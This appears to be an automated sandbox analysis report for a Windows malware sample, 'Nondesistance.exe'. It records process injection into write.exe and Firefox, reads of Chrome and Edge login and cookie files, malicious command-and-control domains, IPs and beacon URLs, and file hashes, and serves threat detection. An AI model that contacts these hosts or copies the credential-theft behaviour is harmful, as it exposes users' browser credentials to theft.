Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: NULL target: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Nondesistance.exe	Section loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: NULL target: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: NULL target: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager&
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
172.253.62.132	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
208.112.85.150	fivetownsjcc.com	United States	20021	LNH-INCUS	true
79.98.25.1	www.maxiwalls.com	Lithuania	62282	RACKRAYUABRakrejusLT	true
84.32.84.32	noispisok.com	Lithuania	33922	NTT-LT-ASLT	true
142.251.16.101	drive.google.com	United States	15169	GOOGLEUS	false
64.190.62.22	www.donantedeovulos.space	United States	11696	NBS11696US	true
91.195.240.123	www.l7aeh.us	Germany	47846	SEDO-ASDE	true
3.64.163.50	www.gaglianoart.com	United States	16509	AMAZON-02US	true
147.92.36.247	a258paw.yb550.com	Hong Kong	59371	DNC-ASDimensionNetworkCommunicationLimitedHK	true
116.203.164.244	www.wp-bits.online	Germany	24940	HETZNER-ASDE	true
203.161.49.193	www.funtechie.top	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
3.73.27.108	lb.webnode.io	United States	16509	AMAZON-02US	true
217.70.184.50	webredir.vip.gandi.net	France	29169	GANDI-ASDomainnameregistrar-httpwwwgandinetFR	true
162.209.189.152	gly.gly301payr.com	United States	40065	CNSERVERSUS	false
183.111.161.243	grimfilm.co.kr	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
185.215.4.19	academynadpo.ru	Denmark	50129	TVHORADADAES	true

Name	Malicious	Antivirus Detection	Reputation
http://www.uhahiq.com/udud/?Pl9P8ldX=JeW1ywHbInp/iudCt0BoISDa+lnGE8/XYCCr+igFIIlNiJFqeEfQ/jwRjatbRGfuzAuKF9+1993CsJcrjcNhPJvZ+1kkeDtgpfW+DhUrRm2QAt+ZR6HWj8c=&UJ2H=ED2dW8S8UxwlG	true	Avira URL Cloud: safe	unknown
http://www.donantedeovulos.space/udud/	true	Avira URL Cloud: malware	unknown
http://www.lm2ue.us/udud/	true	Avira URL Cloud: safe	unknown
http://www.fivetownsjcc.com/udud/?78wx=IVkh-DpXGR&Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=	true	Avira URL Cloud: safe	unknown
http://www.noispisok.com/udud/?Pl9P8ldX=o//LU1QIruq3a+llS5WSA3MhPk/fn3r1eotnxTFa/e8OUp/jL5i10F1rY2VLIPDErdjGMTht5s2Ux60YHU9QFnGu9iPsukiHU979EPg7OqcwQWhMz0uyXSg=&UJ2H=ED2dW8S8UxwlG	true	Avira URL Cloud: safe	unknown
http://www.academynadpo.ru/udud/	true	Avira URL Cloud: safe	unknown
http://www.valentinaetommaso.it/udud/	true	Avira URL Cloud: safe	unknown
http://www.uhahiq.com/udud/	true	Avira URL Cloud: safe	unknown
http://www.wp-bits.online/udud/	true	Avira URL Cloud: safe	unknown
http://www.mindfreak.live/udud/	true	Avira URL Cloud: safe	unknown
http://www.mindfreak.live/udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG	true	Avira URL Cloud: safe	unknown
http://www.grimfilm.co.kr/udud/	true	Avira URL Cloud: safe	unknown
http://www.wp-bits.online/udud/?pzH0=GNw0Cp4PdpF&Pl9P8ldX=NYPylna2Z9eGKk0n2zL98jmopuuDXUwTW1hg/NJ4dH1aG6U36Zymeq8Q+jA5ULsRtwMU5Sxc1U1KJPrtknew8LZ9GrpjSEZ/84zq63NvruY/sq3UYTRA7EE=	true	Avira URL Cloud: safe	unknown
http://www.academynadpo.ru/udud/?Pl9P8ldX=lxKI396dcfUopLOCgIwHig2W2DxUvRX97MJRzioDZqj6Mq9AZ90i2wJz7BzjxOGPWVxSz39xtFFcwgb3QegZat7wpytzNwJDmdPz0ImKOxyDMBvGUlbFyek=&pzH0=GNw0Cp4PdpF	true	Avira URL Cloud: safe	unknown
http://www.gaglianoart.com/udud/?78wx=IVkh-DpXGR&Pl9P8ldX=s4Vg1LN8KF8xRZjsTtx1ePAa6rrZ5tQl+fVkjM0Cwqz81ntfAq/M/gVPDnM69uqRMv9oQTSMlpkV8bcLOwxh9sPoo9S5h5afGeOqgp9TfQfssWCdBUAOLW8=	true	Avira URL Cloud: safe	unknown
http://www.avocatmh.org/udud/?Pl9P8ldX=CE5650FDbfXnpQA/eK0NgrbRbNtPjFAUxQ7joq83O2JD2van08dDJXT7jPsZwBcB76Ina7ciMfrueGFKvr7HGptlhVNK1F0UnKlYvzZl0mKZiEoX7KROJkU=&UJ2H=ED2dW8S8UxwlG	true	Avira URL Cloud: safe	unknown
http://www.avocatmh.org/udud/	true	Avira URL Cloud: safe	unknown
http://www.lm2ue.us/udud/?Pl9P8ldX=0fut0+GuUFbft3VBL5xm0Hp90TDKfhipdS4VXGxzAEleMWehH5gQwP182GbMnYpRKYVXdyZjU035jwIjvCFAGk2/B20KDJmRwuIeT4QhTHXMvWA5X1/HJWk=&UJ2H=ED2dW8S8UxwlG	true	Avira URL Cloud: safe	unknown
http://www.noispisok.com/udud/	true	Avira URL Cloud: safe	unknown
http://www.maxiwalls.com/udud/	true	Avira URL Cloud: safe	unknown
http://www.maxiwalls.com/udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG	true	Avira URL Cloud: safe	unknown
http://www.l7aeh.us/udud/	true	Avira URL Cloud: safe	unknown
http://www.grimfilm.co.kr/udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG	true	Avira URL Cloud: safe	unknown
http://www.donantedeovulos.space/udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG	true	Avira URL Cloud: malware	unknown
http://www.l7aeh.us/udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG	true	Avira URL Cloud: safe	unknown
http://www.funtechie.top/udud/	true	Avira URL Cloud: safe	unknown
http://www.fivetownsjcc.com/udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG	true	Avira URL Cloud: safe	unknown

ID:	1447915
Product:	CloudBasic
Start time:	12:28:18
Start date:	27.05.2024
Sample:	Nondesistance.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	9695b61f42f2e5a77e2e8d29963fe980
SHA1:	92396f929ffc0ec1c2929dcba7fa2b3de5859bc0
SHA256:	1c6b868bda50a13de084c97460436742b1636b75e60708eeecb9c44d574ccce9
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\2f76976	SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 3, database pages 92, cookie 0x3a, schema 4, UTF-8, version-valid-for 3	BE092D0FC1A86091764AABD40B25CB9E	1372556BBC211898F393CC02C4285705AACAE3D7	3A83C0434C667BB30FD9D85D908E652A2569239BBD61079849F299409A48D545
C:\Users\user\AppData\Local\Temp\Settings.ini	ASCII text, with CRLF line terminators	F5FDC9A00B0149608E24C58FD5249EA4	E2D50A7CDC8E7A9F9CC9F86074AE23F86A32F841	12D2CA5CF65237CE9AC610E3A80AD20135A76D7E62C1FD92DED6CEA68F774C7C
C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	B8992E497D57001DDF100F9C397FCEF5	E26DDF101A2EC5027975D2909306457C6F61CFBD	98BCD1DD88642F4DD36A300C76EBB1DDFBBBC5BFC7E3B6D7435DC6D6E030C13B
C:\Users\user\Desktop\betnksomme.lnk	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide	91422962043111D43F5BF627D7351B97	EA38CEB1BEADCE16E3F744EA1F9891CFAFD4CBEB	EB85BD9933CB721C2D21F5E83EEAAC1B097DB60EAFBA378F9B402AF5884C3AA5
C:\Users\user\dewater\reinsmen\Transversally.Nor	data	89A22809A4D9410B8EC476B4FD7A47F6	F4562B8538F640E67D0BD4D5D45218C12587F64A	F720F87C41DD1FD5068412983F93280011C03E00D6C2CA9A4B229C2CF38F82B3
C:\Users\user\dewater\reinsmen\Undisclaimed.smi	data	15086A2F35483FA21698895B6782DF8E	6AD798618E183D7FEBF163B039C3AE2FB50B2CD9	4B0C2B861F5C47806E6867575455247161434E204ADB92AB64E4833704A766D4
C:\Users\user\dewater\reinsmen\blyindholdene.irr	data	C2380BB148EBA394BBCAAE245586A67F	020741FF474FC23B667F62EDD835D4C49E2A92DF	DE656771FCE0CF164EB1876321D1EC9033DA5BE088B07F98EBAA6F9CABBFC149
C:\Users\user\dewater\reinsmen\danite.txt	ASCII text, with CRLF line terminators	7822DA4CB788A4E45B36549F28A392C8	9B9AD515D5B1042E6C6C3D7F766AA318D69AF5A2	B08B0B8C9E2DC6B97815501883D21EC3849A978B91ABE0B685FAD68C6272411B

Windows Analysis Report Nondesistance.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Nondesistance.exe

Malware Threat Intel
Provided by